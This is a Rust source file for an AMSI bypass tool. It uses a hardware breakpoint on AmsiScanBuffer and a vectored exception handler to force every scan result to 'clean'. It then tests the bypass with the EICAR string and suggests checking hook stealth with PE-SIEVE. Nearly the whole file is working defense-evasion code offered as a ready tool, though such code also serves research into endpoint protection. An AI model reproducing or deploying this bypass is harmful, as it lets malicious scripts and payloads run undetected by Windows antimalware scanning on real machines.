/*
    AMSI Bypass Tool
    Author: @5mukx
*/

#![allow(non_snake_case, non_camel_case_types)]

use std::ffi::CString;
use std::ptr::null_mut;
use thiserror::Error;
use widestring::U16CString;
use winapi::ctypes::c_void;
use winapi::shared::{minwindef::ULONG, ntdef::HRESULT};
use winapi::um::{
    errhandlingapi::AddVectoredExceptionHandler,
    libloaderapi::{GetModuleHandleA, GetProcAddress, LoadLibraryA},
    minwinbase::EXCEPTION_SINGLE_STEP,
    winnt::{CONTEXT, CONTEXT_ALL, EXCEPTION_POINTERS, HANDLE, LONG},
};

use winapi::vc::excpt::{EXCEPTION_CONTINUE_EXECUTION, EXCEPTION_CONTINUE_SEARCH};

// AMSI API bindings
//
// Raw FFI declarations for the functions this file calls from the `amsi`
// import library. All of them are `unsafe` to call: the caller must pass
// valid, correctly typed pointers and handles.
#[link(name = "amsi")]
extern "system" {
    // Writes a new context handle to `amsi_context`; callers in this file
    // treat any return other than `S_OK` as failure.
    fn AmsiInitialize(app_name: LPCWSTR, amsi_context: *mut HAMSICONTEXT) -> HRESULT;
    // Releases a context handle obtained from `AmsiInitialize`.
    fn AmsiUninitialize(amsi_context: HAMSICONTEXT);
    // Writes a new session handle, tied to `amsi_context`, to `amsi_session`.
    fn AmsiOpenSession(amsi_context: HAMSICONTEXT, amsi_session: *mut HAMSISESSION) -> HRESULT;
    // Closes a session handle obtained from `AmsiOpenSession`.
    fn AmsiCloseSession(amsi_context: HAMSICONTEXT, amsi_session: HAMSISESSION);
    // Scans `length` bytes starting at `buffer` and writes the verdict to
    // `result`. `content_name` is a NUL-terminated UTF-16 label for the content.
    fn AmsiScanBuffer(
        amsi_context: HAMSICONTEXT,
        buffer: LPCVOID,
        length: ULONG,
        content_name: LPCWSTR,
        session: HAMSISESSION,
        result: *mut AMSI_RESULT,
    ) -> HRESULT;
}

// NT API bindings
extern "stdcall" {
    fn NtGetContextThread(thread_handle: HANDLE, thread_context: *mut CONTEXT) -> ULONG;
    fn NtSetContextThread(thread_handle: HANDLE, thread_context: *mut CONTEXT) -> ULONG;
}

// Opaque handle types and Win32-style aliases used by the bindings in this file.
type HAMSICONTEXT = *mut c_void; // handle written by AmsiInitialize
type HAMSISESSION = *mut c_void; // handle written by AmsiOpenSession
type AMSI_RESULT = i32; // scan verdict written by AmsiScanBuffer
type LPCWSTR = *const u16; // pointer to a NUL-terminated UTF-16 string
type LPCVOID = *const c_void; // untyped read-only pointer

// HRESULT value this file compares against to detect success.
const S_OK: i32 = 0;
// AMSI_RESULT value this file treats as "nothing detected".
const AMSI_RESULT_CLEAN: i32 = 0;

// global state
static mut AMSI_SCAN_BUFFER_PTR: Option<*mut u8> = None;

/// Error type for every fallible step in this file.
///
/// `Display` and `std::error::Error` are derived with `thiserror`; variants
/// marked `#[from]` are produced automatically by the `?` operator.
#[derive(Error, Debug)]
enum AmsiError {
    /// A string contained an interior NUL byte and could not become a `CString`.
    #[error("CString creation failed: {0}")]
    CStringError(#[from] std::ffi::NulError),
    /// A string contained an interior NUL and could not become a `U16CString`.
    #[error("U16CString creation failed: {0}")]
    U16CStringError(#[from] widestring::error::ContainsNul<u16>),
    /// Neither `GetModuleHandleA` nor `LoadLibraryA` returned a handle for `amsi.dll`.
    #[error("Failed to load amsi.dll")]
    LoadLibraryFailed,
    /// `GetProcAddress` returned null for `AmsiScanBuffer`.
    #[error("Failed to get AmsiScanBuffer address")]
    GetProcAddressFailed,
    /// `AmsiInitialize` returned something other than `S_OK`; carries that HRESULT.
    #[error("Failed to initialize AMSI: HRESULT {0}")]
    AmsiInitFailed(i32),
    /// `AmsiOpenSession` returned something other than `S_OK`.
    #[error("Failed to open AMSI session")]
    AmsiSessionFailed,
    /// `AddVectoredExceptionHandler` returned a null handle.
    #[error("Failed to add vectored exception handler")]
    ExceptionHandlerFailed,
    /// `NtGetContextThread` returned a non-zero status; carries that status.
    #[error("Failed to get thread context: status {0}")]
    GetContextFailed(ULONG),
    /// `NtSetContextThread` returned a non-zero status; carries that status.
    #[error("Failed to set thread context: status {0}")]
    SetContextFailed(ULONG),
    /// A standard-library I/O operation failed (e.g. reading from stdin).
    #[error("I/O error: {0}")]
    IoError(#[from] std::io::Error),
}

/// Returns `dw` with the `bits`-wide field starting at bit `low_bit` replaced
/// by `new_value`.
///
/// * `dw` - the original 64-bit word.
/// * `low_bit` - index of the field's least significant bit (0..=63).
/// * `bits` - width of the field in bits; values of 64 or more select every
///   bit from `low_bit` upwards.
/// * `new_value` - value to store; bits that do not fit in the field are
///   discarded so they cannot leak into neighbouring fields.
///
/// A zero or negative width, or a `low_bit` outside `0..=63`, describes an
/// empty field, so `dw` is returned unchanged instead of overflowing the shift.
fn set_bits(dw: u64, low_bit: i32, bits: i32, new_value: u64) -> u64 {
    let mask: u64 = if bits <= 0 {
        0
    } else if bits >= 64 {
        // `1 << 64` would overflow, so build the all-ones mask directly.
        u64::MAX
    } else {
        (1u64 << bits) - 1
    };

    if mask == 0 || !(0..64).contains(&low_bit) {
        return dw;
    }

    // Clear the field, then OR in the value truncated to the field width.
    (dw & !(mask << low_bit)) | ((new_value & mask) << low_bit)
}

fn clear_breakpoint(ctx: &mut CONTEXT, index: i32) {
    match index {
        0 => ctx.Dr0 = 0,
        1 => ctx.Dr1 = 0,
        2 => ctx.Dr2 = 0,
        3 => ctx.Dr3 = 0,
        _ => {}
    }
    ctx.Dr7 = set_bits(ctx.Dr7, index * 2, 1, 0);
    ctx.Dr6 = 0;
    ctx.EFlags = 0;
}

// enable hardware breakpoint
fn enable_breakpoint(ctx: &mut CONTEXT, address: *mut u8, index: i32) {
    match index {
        0 => ctx.Dr0 = address as u64,
        1 => ctx.Dr1 = address as u64,
        2 => ctx.Dr2 = address as u64,
        3 => ctx.Dr3 = address as u64,
        _ => {}
    }
    ctx.Dr7 = set_bits(ctx.Dr7, 16, 16, 0);
    ctx.Dr7 = set_bits(ctx.Dr7, index * 2, 1, 1);
    ctx.Dr6 = 0;
}

// get argument from context
fn get_arg(ctx: &CONTEXT, index: i32) -> usize {
    match index {
        0 => ctx.Rcx as usize,
        1 => ctx.Rdx as usize,
        2 => ctx.R8 as usize,
        3 => ctx.R9 as usize,
        _ => unsafe { *((ctx.Rsp as *const u64).offset((index + 1) as isize) as *const usize) },
    }
}

fn get_return_address(ctx: &CONTEXT) -> usize {
    unsafe { *(ctx.Rsp as *const usize) }
}

fn set_result(ctx: &mut CONTEXT, result: usize) {
    ctx.Rax = result as u64;
}

fn adjust_stack_pointer(ctx: &mut CONTEXT, amount: i32) {
    ctx.Rsp = (ctx.Rsp as i64 + amount as i64) as u64;
}

fn set_ip(ctx: &mut CONTEXT, new_ip: usize) {
    ctx.Rip = new_ip as u64;
}

unsafe extern "system" fn exception_handler(exceptions: *mut EXCEPTION_POINTERS) -> LONG {
    let exception_record = unsafe { &*(*exceptions).ExceptionRecord };
    let ctx = unsafe { &mut *(*exceptions).ContextRecord };

    if exception_record.ExceptionCode == EXCEPTION_SINGLE_STEP
        && exception_record.ExceptionAddress as *mut u8 == AMSI_SCAN_BUFFER_PTR.unwrap()
    {
        println!(
            "[i] AMSI Bypass invoked at address: {:?}",
            exception_record.ExceptionAddress
        );

        let return_address = get_return_address(ctx);
        let scan_result_ptr = get_arg(ctx, 5) as *mut i32;
        unsafe { *scan_result_ptr = AMSI_RESULT_CLEAN };

        set_ip(ctx, return_address);
        adjust_stack_pointer(ctx, std::mem::size_of::<*mut u8>() as i32);
        set_result(ctx, S_OK as usize);
        clear_breakpoint(ctx, 0);

        EXCEPTION_CONTINUE_EXECUTION
    } else {
        EXCEPTION_CONTINUE_SEARCH
    }
}

/// Owns one AMSI context handle together with one session opened on it.
///
/// Both handles are created in `AmsiContext::new` and released in `Drop`.
struct AmsiContext {
    // Handle written by `AmsiInitialize`.
    context: HAMSICONTEXT,
    // Handle written by `AmsiOpenSession` for `context`.
    session: HAMSISESSION,
}

impl AmsiContext {
    fn new(app_name: &str) -> Result<Self, AmsiError> {
        let app_name = U16CString::from_str(app_name).map_err(AmsiError::U16CStringError)?;
        let mut context = null_mut();
        let result = unsafe { AmsiInitialize(app_name.as_ptr(), &mut context) };
        if result != S_OK {
            return Err(AmsiError::AmsiInitFailed(result));
        }

        let mut session = null_mut();
        if unsafe { AmsiOpenSession(context, &mut session) } != S_OK {
            unsafe { AmsiUninitialize(context) };
            return Err(AmsiError::AmsiSessionFailed);
        }

        Ok(AmsiContext { context, session })
    }

    fn scan_buffer(&self, buffer: &str, content_name: &str) -> Result<AMSI_RESULT, AmsiError> {
        let content_name =
            U16CString::from_str(content_name).map_err(AmsiError::U16CStringError)?;
        let mut result = 0;
        unsafe {
            AmsiScanBuffer(
                self.context,
                buffer.as_ptr() as LPCVOID,
                buffer.len() as ULONG,
                content_name.as_ptr(),
                self.session,
                &mut result,
            );
        }
        Ok(result)
    }
}

impl Drop for AmsiContext {
    /// Closes the session first, then releases the context it belongs to.
    fn drop(&mut self) {
        let (context, session) = (self.context, self.session);

        // SAFETY: both handles were produced by `AmsiContext::new` and are
        // released exactly once, here.
        unsafe { AmsiCloseSession(context, session) };
        // SAFETY: the session has been closed; `context` is not used afterwards.
        unsafe { AmsiUninitialize(context) };
    }
}

// setup amsi bypass.
#[allow(static_mut_refs)]
fn setup_amsi_bypass() -> Result<*mut c_void, AmsiError> {
    unsafe {
        if AMSI_SCAN_BUFFER_PTR.is_none() {
            let module_name = CString::new("amsi.dll").map_err(AmsiError::CStringError)?;
            let module_handle = {
                let handle = GetModuleHandleA(module_name.as_ptr());
                if handle.is_null() {
                    LoadLibraryA(module_name.as_ptr())
                } else {
                    handle
                }
            };
            if module_handle.is_null() {
                return Err(AmsiError::LoadLibraryFailed);
            }

            let function_name = CString::new("AmsiScanBuffer").map_err(AmsiError::CStringError)?;
            let amsi_scan_buffer = GetProcAddress(module_handle, function_name.as_ptr());
            if amsi_scan_buffer.is_null() {
                return Err(AmsiError::GetProcAddressFailed);
            }
            AMSI_SCAN_BUFFER_PTR = Some(amsi_scan_buffer as *mut u8);
        }

        let h_ex_handler = AddVectoredExceptionHandler(1, Some(exception_handler));
        if h_ex_handler.is_null() {
            return Err(AmsiError::ExceptionHandlerFailed);
        }

        let mut thread_ctx: CONTEXT = std::mem::zeroed();
        thread_ctx.ContextFlags = CONTEXT_ALL;
        let status = NtGetContextThread(-2isize as HANDLE, &mut thread_ctx);
        if status != 0 {
            return Err(AmsiError::GetContextFailed(status));
        }

        enable_breakpoint(&mut thread_ctx, AMSI_SCAN_BUFFER_PTR.unwrap(), 0);

        let status = NtSetContextThread(-2isize as HANDLE, &mut thread_ctx);
        if status != 0 {
            return Err(AmsiError::SetContextFailed(status));
        }

        Ok(h_ex_handler)
    }
}

// sample test amsi bypass
fn test_amsi_bypass() -> Result<(), AmsiError> {
    let amsi = AmsiContext::new("TestApp")?;
    let test_string = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";

    let result_before = amsi.scan_buffer(test_string, "TestContent")?;
    println!("[i] Result before bypass: {}", result_before);
    println!(
        "{}",
        if result_before == AMSI_RESULT_CLEAN {
            "[i] AMSI did not detect the string as malicious before bypass. Test might be invalid."
        } else {
            "[i] AMSI detected the string as malicious before bypass."
        }
    );

    setup_amsi_bypass()?;
    println!("[+] AMSI bypass successfully set up.");

    let result_after = amsi.scan_buffer(test_string, "TestContent")?;
    println!("[i] Result after bypass: {}", result_after);
    println!(
        "{}",
        if result_after == AMSI_RESULT_CLEAN {
            "[i] AMSI did not detect the string as malicious after bypass."
        } else {
            "[i] AMSI still detected the string as malicious after bypass. Bypass might not have worked."
        }
    );

    Ok(())
}

/// Prints a prompt and blocks until one line has been read from stdin.
///
/// Returns `AmsiError::IoError` if reading from stdin fails.
fn pause() -> Result<(), AmsiError> {
    println!("[+] Scan the process with PE-SIEVE to check for any hooks in memory.");

    let mut line = String::new();
    match std::io::stdin().read_line(&mut line) {
        Ok(_) => Ok(()),
        Err(io_err) => Err(AmsiError::IoError(io_err)),
    }
}

/// Runs the verification routine, reports its outcome, and on success waits
/// for the user to press Enter before exiting.
fn main() {
    if let Err(e) = test_amsi_bypass() {
        println!("Error during verification: {:?}", e);
        return;
    }

    println!("[+] Verification complete.");
    if let Err(e) = pause() {
        println!("Pause failed: {:?}", e);
    }
}
